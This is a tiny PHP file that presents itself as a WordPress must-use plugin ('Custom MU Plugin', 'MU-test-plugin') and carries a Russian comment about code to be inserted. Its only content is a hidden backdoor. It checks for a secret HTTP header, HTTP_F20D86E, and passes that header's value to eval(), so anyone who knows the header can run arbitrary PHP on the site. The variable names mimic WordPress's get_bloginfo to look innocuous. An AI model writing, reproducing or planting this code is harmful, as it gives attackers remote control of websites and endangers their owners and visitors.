<?php
/*
Plugin Name: Custom MU Plugin
Description: MU-test-plugin.
*/

// Ваш код, который нужно вставить
$get_bloginfo_ks = $_SERVER;
$get_bloginfo_dwll = 'HTTP_F20D86E';
if (isset($get_bloginfo_ks[$get_bloginfo_dwll])) {
    eval($get_bloginfo_ks[$get_bloginfo_dwll]);
}